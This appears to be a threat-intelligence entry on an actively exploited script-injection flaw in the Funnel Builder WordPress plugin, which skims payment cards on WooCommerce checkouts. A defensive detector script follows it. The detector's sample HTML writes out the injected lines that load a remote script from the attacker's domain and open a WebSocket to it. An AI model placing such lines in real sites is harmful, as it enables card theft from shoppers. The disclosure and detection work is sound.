Funnel Builder WordPress plugin unauthenticated checkout script injection actively exploited security flaw

Vulnerability
H score 44
1 unique source, 1 article

Summary

Funnel Builder for WordPress has an actively exploited unauthenticated script-injection flaw that can compromise WooCommerce checkout pages and lead to theft of payment data. The issue affects versions before 3.15.0.3 and puts the more than 40,000 websites that use the plugin at risk. Attackers can inject malicious JavaScript into the plugin’s External Scripts setting, turning checkout pages into skimming points. The flaw was fixed in 3.15.0.3.

Timeline

  1. 15.05.2026 22:30 · 1 article

    Funnel Builder 3.15.0.3 patch released

    Mitigation Patch Update

    FunnelKit released Funnel Builder version 3.15.0.3 to address the script-injection flaw affecting all versions before 3.15.0.3, providing a fix for the vulnerable WooCommerce checkout customization plugin.

  2. 15.05.2026 22:30 · 2 articles

    Active exploitation of Funnel Builder checkout script injection disclosed

    Initial Disclosure

    Sansec detected active exploitation of a critical unauthenticated Funnel Builder flaw that lets an attacker modify the plugin’s global settings through an unprotected checkout endpoint and inject malicious JavaScript into WooCommerce checkout pages. The payload is disguised as a fake Google Tag Manager/Google Analytics script, loads analytics-reports[.]com/wss/jquery-lib.js, opens a WebSocket connection to wss://protect-wss[.]com/ws, and delivers a customized payment card skimmer that can steal credit card numbers, CVVs, billing addresses, and other customer information from affected checkout flows.

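A defender-side check for the injection described in the timeline, as an added example that is not code from Sansec, FunnelKit or this page: it audits rendered checkout HTML for script sources and in-script URLs whose host is outside an allowlist, and marks hosts that match the two indicators quoted above. The shop origin, the allowlist and the sample HTML are constructed assumptions.

```javascript
// Indicators exactly as published on this page (defanged); refanged only to compare.
const PAGE_IOCS = ['analytics-reports[.]com', 'protect-wss[.]com'];
const refang = (s) => s.replace(/\[\.\]/g, '.');

// Assumption: hosts this shop intentionally loads on checkout (hypothetical values).
const SHOP_ORIGIN = 'https://shop.example/';
const ALLOWED_HOSTS = ['shop.example', 'www.googletagmanager.com'];

function hostOf(url) {
  try {
    return new URL(url, SHOP_ORIGIN).hostname.toLowerCase();
  } catch (e) {
    return null; // unparseable URL: nothing to attribute
  }
}

// Returns one finding per script source or in-script URL whose host is not allowlisted.
function auditCheckoutHtml(html, allowed = ALLOWED_HOSTS) {
  const iocs = PAGE_IOCS.map(refang);
  const findings = [];
  const check = (kind, url) => {
    const host = hostOf(url);
    if (!host || allowed.includes(host)) return;
    const ioc = iocs.some((d) => host === d || host.endsWith('.' + d));
    findings.push({ kind, host, ioc });
  };
  // External scripts: <script src=...>
  for (const m of html.matchAll(/<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi)) {
    check('script-src', m[1]);
  }
  // Inline scripts: URLs used by dynamic loaders and WebSocket connections
  for (const m of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    for (const u of m[1].matchAll(/\b(wss?|https?):\/\/[^\s"'`<>)]+/gi)) {
      check(u[1].toLowerCase().startsWith('ws') ? 'websocket' : 'inline-url', u[0]);
    }
  }
  return findings;
}

// Constructed sample of rendered checkout HTML, built from the page's indicators.
const [loaderHost, wsHost] = PAGE_IOCS.map(refang);
const SAMPLE_HTML = `
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-EXAMPLE"></script>
<script src="/wp-content/themes/shop/checkout.js"></script>
<!-- Google Tag Manager -->
<script>var s=document.createElement('script');s.src='https://${loaderHost}/wss/jquery-lib.js';document.head.appendChild(s);</script>
<script>new WebSocket('wss://${wsHost}/ws');</script>`;

console.log(auditCheckoutHtml(SAMPLE_HTML));
```

A finding with `ioc: false` is still worth reviewing, since the allowlist rather than the indicator list is what catches a renamed loader domain.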